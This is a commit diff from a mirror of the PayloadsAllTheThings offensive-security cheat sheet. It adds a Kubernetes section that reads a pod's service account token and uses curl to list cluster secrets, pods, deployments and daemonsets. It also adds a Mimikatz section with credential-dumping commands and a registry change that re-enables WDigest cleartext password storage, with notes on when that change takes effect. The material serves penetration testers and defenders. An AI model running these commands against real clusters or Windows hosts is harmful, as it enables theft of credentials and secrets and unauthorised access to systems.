mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
Kubernetes - Privileged Service Account Token
This commit is contained in:
parent
cf5a4b6e97
commit
1535c5f1b3
@ -12,6 +12,8 @@
|
||||
- [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec)
|
||||
- [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings)
|
||||
- [Impersonating a Privileged Account](#impersonating-a-privileged-account)
|
||||
- [Privileged Service Account Token](#privileged-service-account-token)
|
||||
- [Interesting endpoints to reach](#interesting-endpoints-to-reach)
|
||||
- [API addresses that you should know](#api-adresses-that-you-should-know)
|
||||
- [References](#references)
|
||||
|
||||
@ -111,6 +113,29 @@ curl -k -v -X POST -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" -H "Conten
|
||||
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
|
||||
```
|
||||
|
||||
## Privileged Service Account Token
|
||||
|
||||
```powershell
|
||||
$ cat /run/secrets/kubernetes.io/serviceaccount/token
|
||||
$ curl -k -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
|
||||
```
|
||||
|
||||
## Interesting endpoints to reach
|
||||
|
||||
```powershell
|
||||
# List Pods
|
||||
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/pods/
|
||||
|
||||
# List secrets
|
||||
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/default/secrets/
|
||||
|
||||
# List deployments
|
||||
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/deployments
|
||||
|
||||
# List daemonsets
|
||||
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip:<port>/apis/extensions/v1beta1/namespaces/default/daemonsets
|
||||
```
|
||||
|
||||
|
||||
## API addresses that you should know
|
||||
|
||||
|
@ -21,6 +21,8 @@ mimikatz # sekurlsa::wdigest
|
||||
|
||||
## Mimikatz - Extract passwords
|
||||
|
||||
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
|
||||
|
||||
```powershell
|
||||
mimikatz_command -f sekurlsa::logonPasswords full
|
||||
mimikatz_command -f sekurlsa::wdigest
|
||||
@ -28,8 +30,21 @@ mimikatz_command -f sekurlsa::wdigest
|
||||
# to re-enable wdigest in Windows Server 2012+
|
||||
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
|
||||
# create a DWORD 'UseLogonCredential' with the value 1.
|
||||
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
|
||||
```
|
||||
|
||||
:warning: To take effect, conditions are required :
|
||||
- Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
|
||||
* Adding requires lock
|
||||
* Removing requires signout
|
||||
- Win10:
|
||||
* Adding requires signout
|
||||
* Removing requires signout
|
||||
- Win2016:
|
||||
* Adding requires lock
|
||||
* Removing requires reboot
|
||||
|
||||
|
||||
## Mimikatz - Mini Dump
|
||||
|
||||
Dump the lsass process.
|
||||
|
@ -13,6 +13,7 @@
|
||||
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
|
||||
- [Remote Code Execution with Java](#remote-code-execution-with-java)
|
||||
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
|
||||
- [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user